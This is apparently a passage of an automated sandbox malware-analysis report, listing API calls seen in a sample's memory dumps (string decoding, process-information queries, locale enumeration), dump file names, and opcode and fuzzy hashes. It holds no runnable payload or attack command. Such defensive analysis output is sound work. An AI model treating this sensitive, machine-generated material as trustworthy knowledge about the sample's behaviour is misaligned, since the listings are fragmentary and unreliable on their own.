                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000002AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000002DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314877045.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_80000_noll.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Heap$AllocBinaryCryptProcessString
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 1871034439-0
                                                                                                                                                                                                                                                    • Opcode ID: 8ad2ccb68b7e62f38234a374ffbd9528eb25944b8c5ad7cda1c812953dfc57a1
                                                                                                                                                                                                                                                    • Instruction ID: b04dcfa922302052c9d4535ff40150eda35291754237f555204a7299bf7798d2
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 8ad2ccb68b7e62f38234a374ffbd9528eb25944b8c5ad7cda1c812953dfc57a1
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: B3014870A00209BFDF11AF61EC888AF7BBAFF497A4B248569F84587210D7319D50EA60
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • CryptStringToBinaryA.CRYPT32(00086724,00000000,00000001,00000000,?,00000000,00000000), ref: 00088060
                                                                                                                                                                                                                                                    • LocalAlloc.KERNEL32(00000040,?,?,?,00086724,?), ref: 0008806E
                                                                                                                                                                                                                                                    • CryptStringToBinaryA.CRYPT32(00086724,00000000,00000001,00000000,?,00000000,00000000), ref: 00088084
                                                                                                                                                                                                                                                    • LocalFree.KERNEL32(?,?,?,00086724,?), ref: 00088093
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2314013691.0000000000081000.00000080.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2313999161.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314042036.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314085201.00000000000BD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000000DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000000E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000000F4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000101000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000001D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000213000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.000000000021A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000221000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000228000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000239000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000240000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000253000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.000000000025F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000002AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000002DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314877045.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_80000_noll.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: BinaryCryptLocalString$AllocFree
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 4291131564-0
                                                                                                                                                                                                                                                    • Opcode ID: ecc0461930b3791067f7b9d93d7d78beb0bce1b4e1ed0260137e51383f66f6fe
                                                                                                                                                                                                                                                    • Instruction ID: 90c34a9b3a240bfa88a07ae535e9b513ce36b04d64ea4d74752b6b178f2db99b
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: ecc0461930b3791067f7b9d93d7d78beb0bce1b4e1ed0260137e51383f66f6fe
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 07F0C470502234BBDF716F66EC4DE8B7FA8EF0ABA0B504455F909EA250E6718940DBA1
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • GetLocalTime.KERNEL32(?,759183C0,00000000,?,?,?,?,?,?,?,?,0009C5A4,?), ref: 0009C13E
                                                                                                                                                                                                                                                    • SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,0009C5A4,?), ref: 0009C14C
                                                                                                                                                                                                                                                      • Part of subcall function 0009B92A: FileTimeToSystemTime.KERNEL32(?,?,?,?,0009C211,?,?,?,?,?,?,?,?,?,?,0009C5B4), ref: 0009B942
                                                                                                                                                                                                                                                      • Part of subcall function 0009B906: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0009B923
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2314013691.0000000000081000.00000080.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2313999161.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314042036.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314085201.00000000000BD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000000DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000000E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000000F4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000101000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000001D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000213000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.000000000021A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000221000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000228000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000239000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000240000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000253000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.000000000025F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000002AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000002DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314877045.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_80000_noll.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Time$FileSystem$LocalUnothrow_t@std@@@__ehfuncinfo$??2@
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 568878067-0
                                                                                                                                                                                                                                                    • Opcode ID: c99a32d743242c1da9cb954ef6f3b58c9a00cd5038c98ff11f9d8c4cf5f7fb0b
                                                                                                                                                                                                                                                    • Instruction ID: d0a09ef7f2578451d2a39f1583a5412450d1381119217514c886a2d6676e5486
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: c99a32d743242c1da9cb954ef6f3b58c9a00cd5038c98ff11f9d8c4cf5f7fb0b
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: A921E4B19002099FDF48DFA9D9806EE7BF5FF08300F1045AAE949EA21AE7349945DB60
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • GetCurrentProcess.KERNEL32(00000007,00000000,00000004,00000000), ref: 0008146D
                                                                                                                                                                                                                                                    • NtQueryInformationProcess.NTDLL(00000000), ref: 00081474
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2314013691.0000000000081000.00000080.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2313999161.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314042036.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314085201.00000000000BD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000000DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000000E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000000F4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000101000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000001D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000213000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.000000000021A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000221000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000228000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000239000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000240000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000253000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.000000000025F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000002AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000002DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314877045.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_80000_noll.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Process$CurrentInformationQuery
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 3953534283-0
                                                                                                                                                                                                                                                    • Opcode ID: 1666071c1afa3758379cd7b16c3f81852311bd519628eb934d4322caea67abe4
                                                                                                                                                                                                                                                    • Instruction ID: e769d1f8043fa6ac7ca6b1c8b3a82daa775de167bb9fda04eb9b3ed725ddf0eb
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 1666071c1afa3758379cd7b16c3f81852311bd519628eb934d4322caea67abe4
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 69E01271A50204F7EF50ABA0ED0AF9E73ECAB00749F201165A316E60C0D6B8DA019765
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • EnumSystemLocalesA.KERNEL32(Function_0002B1C1,00000001), ref: 000AB56F
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2314013691.0000000000081000.00000080.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2313999161.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314042036.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314085201.00000000000BD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000000DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000000E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000000F4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000101000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000001D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000213000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.000000000021A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000221000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000228000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000239000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000240000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000253000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.000000000025F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000002AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000002DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314877045.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_80000_noll.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: EnumLocalesSystem
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 2099609381-0
                                                                                                                                                                                                                                                    • Opcode ID: c54ba89e86607b31fc916f06672c2ec04e300fbdd0454ddaa9aae76d096e16a0
                                                                                                                                                                                                                                                    • Instruction ID: 2bdd4ea978680dc76daea32ba103bbf102a8e240adf418692865b33b7a4f4f47
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: c54ba89e86607b31fc916f06672c2ec04e300fbdd0454ddaa9aae76d096e16a0
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: F7D05E71A507009BE7204F749D497E17BE0EB12B16F609D49DD92490C1D7B4A5858600
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • SetUnhandledExceptionFilter.KERNEL32(Function_000275EC), ref: 000A7633
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2314013691.0000000000081000.00000080.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2313999161.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314042036.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314085201.00000000000BD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000000DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000000E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000000F4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000101000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000001D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000213000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.000000000021A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000221000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000228000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000239000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000240000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000253000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.000000000025F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000002AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000002DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314877045.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_80000_noll.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: ExceptionFilterUnhandled
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 3192549508-0
                                                                                                                                                                                                                                                    • Opcode ID: 257806282b8ec24e15f0fae0c025f55b270f58567843e56bfa7196d2087927f9
                                                                                                                                                                                                                                                    • Instruction ID: 7f1fa0d1f7bb9cf3c5f13c0bac5e6432931aef7b4cc33988384861b555505063
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 257806282b8ec24e15f0fae0c025f55b270f58567843e56bfa7196d2087927f9
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 7F9002A165964046D60517B55C4D44635986B4A706B414950A105C8054DBD4C1005911
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2314013691.0000000000081000.00000080.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2313999161.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314042036.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314085201.00000000000BD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000000DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000000E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000000F4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000101000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000001D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000213000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.000000000021A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000221000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000228000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000239000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000240000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000253000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.000000000025F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000002AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000002DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314877045.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_80000_noll.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: abfa737703aeb423bcf38effd35900a43ae248d3dc3f5dd7af2df4a19ed5bb61
                                                                                                                                                                                                                                                    • Instruction ID: 1b8f956b2a307819b8c8f833c1d247a2e51d99d13fb52c217f658e52c337c164
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: abfa737703aeb423bcf38effd35900a43ae248d3dc3f5dd7af2df4a19ed5bb61
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 9B02A233D496F24B8BB24EF948906267FE15F03B5031F86AADDD13F596C212ED0696E0
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2314013691.0000000000081000.00000080.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2313999161.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314042036.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314085201.00000000000BD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000000DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000000E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000000F4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000101000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000001D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000213000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.000000000021A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000221000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000228000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000239000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000240000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000253000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.000000000025F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000002AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000002DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314877045.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_80000_noll.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: f02dcea883d10451d84a59732baab65edb0b568fbd8ca007beb23fa60eef1400
                                                                                                                                                                                                                                                    • Instruction ID: fee1c4bdf89745701fb2071b9021c33857be11a7d366cf50063143fc8661b92a
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: f02dcea883d10451d84a59732baab65edb0b568fbd8ca007beb23fa60eef1400
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 0CC17273D0A5B24987B586BD481823FFEA26F93B4131FC3A6DCD13F689C6226D0295D0
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2314013691.0000000000081000.00000080.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2313999161.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314042036.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
